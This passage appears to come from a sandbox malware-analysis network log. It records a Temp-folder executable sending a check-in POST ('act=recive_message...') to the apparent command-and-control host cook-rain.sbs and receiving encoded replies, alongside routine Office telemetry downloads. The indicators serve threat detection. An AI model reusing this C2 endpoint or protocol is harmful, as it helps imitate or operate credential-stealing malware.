                                                                                                                                                                                                                                                                                                            84192.168.2.449827188.114.96.34437968C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                            Content-Length: 53
                                                                                                                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC988INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:34 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=o02jgfbv679ike6np0848tscf3; expires=Mon, 17-Mar-2025 04:57:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NnK9AgOGbrbVV3eBA%2Bw9C8zfUaQhnF6P4jbe%2B%2BOtXoEskgf8bJM9KCJ%2FQSoaGCKAXhEnAn9IFsfc0sNe%2BJlCTzEF5fvmdBYyIATPKt%2BL8atCehCpbMlUSPWeAhiaFoL%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                                            CF-RAY: 8e603be9df6a43aa-EWR
                                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1782&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=950&delivery_rate=1784841&cwnd=239&unsent_bytes=0&cid=661a29fa73e3a39c&ts=728&x=0"
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC381INData Raw: 34 34 36 63 0d 0a 49 56 42 73 50 68 6f 35 72 71 63 32 77 64 51 59 33 51 52 44 37 7a 62 42 54 64 6e 67 48 6b 41 65 4c 73 7a 54 54 54 78 68 77 78 4a 61 63 68 6f 63 49 41 32 43 68 55 57 6b 39 69 4b 70 64 6a 61 4b 47 75 4d 73 76 63 49 6b 4a 6e 39 43 76 37 5a 68 48 68 65 75 4d 42 73 32 44 56 4a 70 58 49 4b 46 55 37 6e 32 49 6f 5a 2f 59 59 70 59 34 33 66 37 68 58 51 69 66 30 4b 75 73 69 5a 54 45 61 39 78 53 54 77 4c 56 6e 39 61 79 73 5a 61 72 4c 46 39 75 47 55 70 67 56 2b 73 4a 62 54 43 4d 6d 4a 37 56 4f 37 70 62 33 45 45 74 33 4e 73 4d 52 39 56 4f 45 53 43 33 42 53 6b 75 6a 72 6e 4a 69 4b 4b 56 4b 30 72 76 59 74 32 4b 48 5a 4b 72 37 63 6e 54 41 69 6c 65 6b 6b 79 43 46 64 31 55 39 37 4c 55 4b 75 36 65 37 4a 6c 59 63 4d 55 70 44 66 37 32 6a 78 78 54 6b 2b 2f 6f
                                                                                                                                                                                                                                                                                                            Data Ascii: 446cIVBsPho5rqc2wdQY3QRD7zbBTdngHkAeLszTTTxhwxJachocIA2ChUWk9iKpdjaKGuMsvcIkJn9Cv7ZhHheuMBs2DVJpXIKFU7n2IoZ/YYpY43f7hXQif0KusiZTEa9xSTwLVn9aysZarLF9uGUpgV+sJbTCMmJ7VO7pb3EEt3NsMR9VOESC3BSkujrnJiKKVK0rvYt2KHZKr7cnTAilekkyCFd1U97LUKu6e7JlYcMUpDf72jxxTk+/o
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC1369INData Raw: 6b 76 69 56 61 44 71 78 32 51 7a 4a 4f 45 6a 68 63 31 49 55 4d 34 35 56 2f 72 32 45 74 6d 78 61 5a 62 36 54 4d 5a 57 4a 37 51 4f 37 70 62 31 59 47 6f 6e 4e 49 50 51 31 55 63 30 6e 4d 31 31 4b 75 73 32 69 35 59 79 2b 48 56 37 45 6c 74 59 52 2f 4b 33 64 46 71 37 59 72 48 6b 33 68 64 31 74 79 56 68 78 5a 56 73 66 4a 58 72 53 32 4f 71 41 6f 4f 4d 31 54 72 32 2f 6a 77 6e 67 6a 65 45 32 71 76 79 46 61 44 36 64 2b 54 6a 30 49 56 6e 68 63 78 73 31 63 6f 72 74 78 73 47 59 6b 67 46 43 6c 49 37 71 48 50 47 77 38 53 37 62 78 64 78 34 74 70 6e 4e 52 63 44 74 66 64 6c 58 4c 30 78 53 38 2b 47 50 2f 59 53 33 4e 44 4f 4d 68 76 6f 31 75 49 32 35 4a 6f 4b 4d 6a 57 77 57 73 63 30 30 79 43 31 74 31 56 63 72 43 56 36 75 79 65 37 46 71 4b 34 35 51 6f 47 2f 31 77 6e 73 36 50 42
                                                                                                                                                                                                                                                                                                            Data Ascii: kviVaDqx2QzJOEjhc1IUM45V/r2EtmxaZb6TMZWJ7QO7pb1YGonNIPQ1Uc0nM11Kus2i5Yy+HV7EltYR/K3dFq7YrHk3hd1tyVhxZVsfJXrS2OqAoOM1Tr2/jwngjeE2qvyFaD6d+Tj0IVnhcxs1cortxsGYkgFClI7qHPGw8S7bxdx4tpnNRcDtfdlXL0xS8+GP/YS3NDOMhvo1uI25JoKMjWwWsc00yC1t1VcrCV6uye7FqK45QoG/1wns6PB
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC1369INData Raw: 58 51 53 69 66 55 51 34 41 46 74 38 56 38 58 49 55 71 4f 78 66 72 70 30 4a 49 52 59 72 32 2f 31 77 6e 73 36 50 42 54 75 6e 69 68 49 41 49 35 7a 55 6a 74 4f 51 7a 5a 43 6a 4d 4a 59 34 2b 34 36 75 47 4d 70 68 6c 4b 72 4c 36 6d 48 63 69 6c 39 52 71 69 77 49 6c 49 46 6f 58 46 44 4e 41 4a 63 66 31 7a 65 31 31 47 6c 70 48 44 2f 4b 47 47 4b 54 4f 4e 33 2b 37 52 73 4e 57 31 61 37 49 51 73 55 41 32 6d 5a 67 4d 74 51 45 55 34 58 4d 43 46 44 4f 4f 39 65 72 4e 68 4b 59 74 51 71 79 43 30 69 32 34 6a 63 45 4b 38 74 69 39 58 44 61 35 38 53 6a 38 4a 55 58 4e 52 77 63 46 54 6f 76 59 30 2f 32 45 35 7a 51 7a 6a 47 61 75 50 63 41 78 33 51 4b 66 78 4d 42 41 61 34 58 64 50 63 6c 59 63 66 46 66 45 7a 31 75 71 76 48 43 77 62 79 47 46 58 61 6f 73 75 34 35 36 49 33 42 41 6f 37 51
                                                                                                                                                                                                                                                                                                            Data Ascii: XQSifUQ4AFt8V8XIUqOxfrp0JIRYr2/1wns6PBTunihIAI5zUjtOQzZCjMJY4+46uGMphlKrL6mHcil9RqiwIlIFoXFDNAJcf1ze11GlpHD/KGGKTON3+7RsNW1a7IQsUA2mZgMtQEU4XMCFDOO9erNhKYtQqyC0i24jcEK8ti9XDa58Sj8JUXNRwcFTovY0/2E5zQzjGauPcAx3QKfxMBAa4XdPclYcfFfEz1uqvHCwbyGFXaosu456I3BAo7Q
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC1369INData Raw: 7a 42 63 66 42 63 63 66 31 65 4d 6e 52 53 76 74 58 61 33 61 53 65 45 57 4b 6b 6d 73 49 35 33 4a 6e 42 46 71 37 63 75 57 77 61 67 64 45 38 34 43 46 39 37 56 4d 50 4b 58 4f 50 34 4f 72 68 2b 59 64 55 55 68 6a 69 77 6a 48 70 69 59 77 4b 33 38 53 68 53 51 2f 6b 77 54 7a 73 49 57 6e 31 58 7a 63 4e 63 70 72 35 2b 76 6d 41 6e 6a 6c 75 6e 4b 72 71 4e 65 43 35 79 52 71 2b 77 49 31 55 4d 71 6e 55 44 66 45 35 62 59 42 75 55 68 57 57 67 6f 47 32 76 61 6d 47 53 47 72 70 76 76 49 34 38 65 6a 78 4e 76 4c 73 6c 55 41 61 75 64 55 41 39 43 56 46 2b 56 38 62 4d 58 4b 57 35 63 36 31 6c 4c 59 4e 54 72 53 4f 31 6a 33 59 68 63 51 7a 67 38 53 68 47 51 2f 6b 77 62 7a 55 44 63 6e 4e 58 79 34 56 4c 37 61 38 36 75 47 70 68 31 52 53 76 4a 62 65 4c 66 43 74 35 52 4b 57 34 4b 6c 38 49
                                                                                                                                                                                                                                                                                                            Data Ascii: zBcfBccf1eMnRSvtXa3aSeEWKkmsI53JnBFq7cuWwagdE84CF97VMPKXOP4Orh+YdUUhjiwjHpiYwK38ShSQ/kwTzsIWn1XzcNcpr5+vmAnjlunKrqNeC5yRq+wI1UMqnUDfE5bYBuUhWWgoG2vamGSGrpvvI48ejxNvLslUAaudUA9CVF+V8bMXKW5c61lLYNTrSO1j3YhcQzg8ShGQ/kwbzUDcnNXy4VL7a86uGph1RSvJbeLfCt5RKW4Kl8I
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC1369INData Raw: 31 41 52 54 68 63 77 49 55 4d 34 37 42 31 74 6d 55 75 6a 46 32 76 49 72 36 4c 65 53 4e 36 53 4b 53 37 4c 31 67 46 6f 48 56 4a 4d 51 39 57 63 56 7a 45 77 6c 65 78 39 6a 54 2f 59 54 6e 4e 44 4f 4d 47 76 4a 42 79 4d 6a 78 54 34 4b 68 76 57 51 2f 68 4b 41 4d 32 42 46 4e 38 58 4d 44 44 55 61 57 37 65 37 42 6e 49 59 4a 51 71 43 61 39 67 33 45 6e 63 55 69 38 75 79 52 52 44 36 68 38 54 6e 4a 41 48 48 39 44 6a 4a 30 55 6b 72 74 30 73 57 45 33 7a 55 76 74 4e 76 75 46 63 47 49 6b 44 4b 2b 39 49 46 30 4d 6f 6e 4e 43 4f 42 78 4f 64 46 4c 45 77 46 69 6f 75 48 79 74 59 43 36 45 56 36 41 6d 76 49 70 77 4b 48 39 4c 37 76 39 76 57 52 76 68 4b 41 4d 52 47 55 78 31 47 39 4f 4c 54 65 4f 78 64 76 38 2b 59 59 56 5a 71 79 57 2f 68 58 45 6c 65 6b 57 38 75 43 70 51 41 36 56 37 54
                                                                                                                                                                                                                                                                                                            Data Ascii: 1ARThcwIUM47B1tmUujF2vIr6LeSN6SKS7L1gFoHVJMQ9WcVzEwlex9jT/YTnNDOMGvJByMjxT4KhvWQ/hKAM2BFN8XMDDUaW7e7BnIYJQqCa9g3EncUi8uyRRD6h8TnJAHH9DjJ0Ukrt0sWE3zUvtNvuFcGIkDK+9IF0MonNCOBxOdFLEwFiouHytYC6EV6AmvIpwKH9L7v9vWRvhKAMRGUx1G9OLTeOxdv8+YYVZqyW/hXElekW8uCpQA6V7T
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC1369INData Raw: 33 58 38 58 4c 58 61 7a 32 4e 50 39 68 4f 63 30 4d 34 77 36 67 67 58 41 76 50 46 50 67 71 47 39 5a 44 2b 45 6f 41 7a 34 41 57 58 68 52 79 73 46 52 70 62 78 2f 76 32 30 69 67 6c 43 6c 4b 37 53 43 64 79 74 39 53 71 75 37 4a 46 67 4f 6f 6e 5a 46 63 6b 41 63 66 30 4f 4d 6e 52 53 44 72 58 65 7a 59 57 47 53 47 72 70 76 76 49 34 38 65 6a 78 48 6f 72 55 6f 58 67 36 69 65 45 59 32 42 46 6c 34 55 39 37 4e 56 4b 53 6b 61 4c 39 76 4a 49 46 58 6f 79 75 39 69 33 6f 68 65 41 7a 67 38 53 68 47 51 2f 6b 77 62 6a 34 4a 64 58 39 41 6a 4e 6f 61 75 76 5a 39 73 79 5a 35 7a 56 57 6f 4a 62 53 50 66 79 52 2f 52 36 75 37 4c 6c 6b 4c 72 47 4a 41 50 51 46 59 65 46 54 4b 77 31 57 73 73 48 32 32 5a 79 6d 4b 46 4f 31 76 76 4a 6f 38 65 6a 78 69 71 62 49 72 48 68 7a 76 61 51 4d 31 41 68
                                                                                                                                                                                                                                                                                                            Data Ascii: 3X8XLXaz2NP9hOc0M4w6ggXAvPFPgqG9ZD+EoAz4AWXhRysFRpbx/v20iglClK7SCdyt9Squ7JFgOonZFckAcf0OMnRSDrXezYWGSGrpvvI48ejxHorUoXg6ieEY2BFl4U97NVKSkaL9vJIFXoyu9i3oheAzg8ShGQ/kwbj4JdX9AjNoauvZ9syZ5zVWoJbSPfyR/R6u7LlkLrGJAPQFYeFTKw1WssH22ZymKFO1vvJo8ejxiqbIrHhzvaQM1Ah
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC1369INData Raw: 31 45 4b 75 70 6e 33 2f 57 57 2f 4e 54 4f 4e 33 2b 37 64 2f 4c 48 4a 4c 75 4b 42 69 65 52 57 72 64 31 4d 31 47 56 4d 34 46 59 7a 44 46 50 76 6c 4e 50 39 69 4d 4d 30 4d 38 33 33 67 31 79 39 31 4c 42 36 78 2f 7a 59 65 46 65 45 6f 45 58 78 4f 54 6a 67 44 6a 49 4a 58 73 61 52 38 76 48 41 69 79 6d 71 64 43 4b 47 50 65 6a 56 74 63 70 43 32 4e 56 4d 46 74 6d 45 50 4a 77 31 53 64 6c 7a 61 68 52 72 6a 75 54 72 6e 58 32 48 46 46 4a 78 68 2b 35 6f 38 65 6a 78 35 72 62 38 68 57 52 57 77 50 57 51 6f 41 31 70 76 53 6f 79 4c 46 4b 58 32 49 75 38 6f 59 59 6c 46 34 33 66 72 30 43 64 33 4c 78 76 2b 34 7a 41 51 47 75 46 6d 41 32 70 63 45 6a 68 4a 6a 4a 30 55 35 4c 56 6f 72 57 41 69 6d 31 66 6b 45 59 57 73 65 79 52 35 53 37 37 7a 41 56 55 58 70 6a 41 4e 63 67 45 63 49 47 4b
                                                                                                                                                                                                                                                                                                            Data Ascii: 1EKupn3/WW/NTON3+7d/LHJLuKBieRWrd1M1GVM4FYzDFPvlNP9iMM0M833g1y91LB6x/zYeFeEoEXxOTjgDjIJXsaR8vHAiymqdCKGPejVtcpC2NVMFtmEPJw1SdlzahRrjuTrnX2HFFJxh+5o8ejx5rb8hWRWwPWQoA1pvSoyLFKX2Iu8oYYlF43fr0Cd3Lxv+4zAQGuFmA2pcEjhJjJ0U5LVorWAim1fkEYWseyR5S77zAVUXpjANcgEcIGK
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC1369INData Raw: 37 41 36 35 7a 52 76 7a 56 43 79 62 2b 50 53 4c 6e 6b 70 48 2f 6e 68 66 55 46 4e 75 44 42 56 63 6c 59 4f 4e 68 76 65 68 51 7a 6a 38 58 6d 74 64 43 65 4f 51 71 42 6f 68 62 78 62 4c 48 74 4e 75 4b 45 34 55 55 79 50 52 6d 49 4d 4d 45 6c 37 56 63 4c 43 51 72 4c 32 4e 50 39 70 59 64 56 74 34 32 66 37 76 54 4a 69 5a 41 7a 32 38 52 70 64 44 61 39 33 56 53 4e 44 65 33 5a 63 7a 64 4e 45 74 4c 6b 31 6b 56 41 41 7a 52 72 6a 4b 66 76 61 4c 6d 77 38 53 4c 2f 78 64 77 35 52 2b 69 55 51 5a 56 34 4f 5a 78 58 56 68 55 4c 6a 37 69 6a 78 4a 6a 50 4e 44 4f 4e 6f 75 4a 42 75 4a 48 39 61 72 66 59 52 59 43 53 76 64 30 49 6b 48 6c 46 30 65 73 2f 55 58 70 32 49 62 37 78 6f 4c 34 70 43 73 6d 2f 31 77 6e 4e 69 4a 48 58 75 2b 57 39 68 54 65 46 6f 41 32 70 4f 61 58 74 56 77 73 4a 43
                                                                                                                                                                                                                                                                                                            Data Ascii: 7A65zRvzVCyb+PSLnkpH/nhfUFNuDBVclYONhvehQzj8XmtdCeOQqBohbxbLHtNuKE4UUyPRmIMMEl7VcLCQrL2NP9pYdVt42f7vTJiZAz28RpdDa93VSNDe3ZczdNEtLk1kVAAzRrjKfvaLmw8SL/xdw5R+iUQZV4OZxXVhULj7ijxJjPNDONouJBuJH9arfYRYCSvd0IkHlF0es/UXp2Ib7xoL4pCsm/1wnNiJHXu+W9hTeFoA2pOaXtVwsJC
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:34 UTC1369INData Raw: 68 33 4a 70 30 57 68 53 79 74 67 54 78 73 50 46 54 75 36 57 39 7a 45 61 5a 67 51 48 41 69 57 33 56 58 6a 4e 6f 61 75 76 5a 73 2f 7a 35 79 77 78 53 78 62 2b 50 43 4f 79 46 75 58 71 69 79 4f 56 31 45 6e 30 35 75 49 41 6c 4d 65 78 6e 39 79 46 43 31 6f 33 6d 76 59 52 2b 7a 65 62 45 6f 71 34 45 2b 42 30 59 4f 6e 36 63 73 58 67 32 6d 4d 41 31 79 46 68 77 67 47 2b 48 58 55 37 4f 31 4f 4a 70 63 59 37 78 43 6f 43 2b 31 68 54 77 39 4d 6c 58 75 70 32 38 47 55 4f 38 77 55 58 4a 57 48 44 39 56 77 63 52 58 72 62 56 6f 72 57 41 69 6d 31 66 6b 45 59 57 74 64 79 4e 73 51 62 2b 38 4b 30 67 39 6e 31 64 46 4e 77 6c 69 52 6d 7a 64 77 6b 54 68 6b 48 6d 70 5a 57 48 44 46 4c 74 76 34 38 4a 62 4a 48 6c 4c 37 76 39 76 57 6b 50 35 4d 47 77 35 44 30 78 31 53 73 48 42 51 75 47 52 66
                                                                                                                                                                                                                                                                                                            Data Ascii: h3Jp0WhSytgTxsPFTu6W9zEaZgQHAiW3VXjNoauvZs/z5ywxSxb+PCOyFuXqiyOV1En05uIAlMexn9yFC1o3mvYR+zebEoq4E+B0YOn6csXg2mMA1yFhwgG+HXU7O1OJpcY7xCoC+1hTw9MlXup28GUO8wUXJWHD9VwcRXrbVorWAim1fkEYWtdyNsQb+8K0g9n1dFNwliRmzdwkThkHmpZWHDFLtv48JbJHlL7v9vWkP5MGw5D0x1SsHBQuGRf


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            85192.168.2.44982813.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:35 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:36 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 2284
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: d35eb2be-501e-0064-3d8c-3a1f54000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111036Z-178bfbc474bv7whqhC1NYC1fg4000000018000000000gmzq
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:36 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            86192.168.2.44982913.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:36 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:36 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: d2879cce-801e-0047-5869-3b7265000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111036Z-178bfbc474bw8bwphC1NYC38b4000000013000000000g5md
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:36 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            87192.168.2.44983113.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:36 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:37 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:36 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 7f9cd87c-f01e-00aa-33aa-3b8521000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111036Z-r1d97b99577tssmjhC1TEB8kan0000000a70000000004g6f
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:37 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            88192.168.2.449833188.114.96.34437968C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
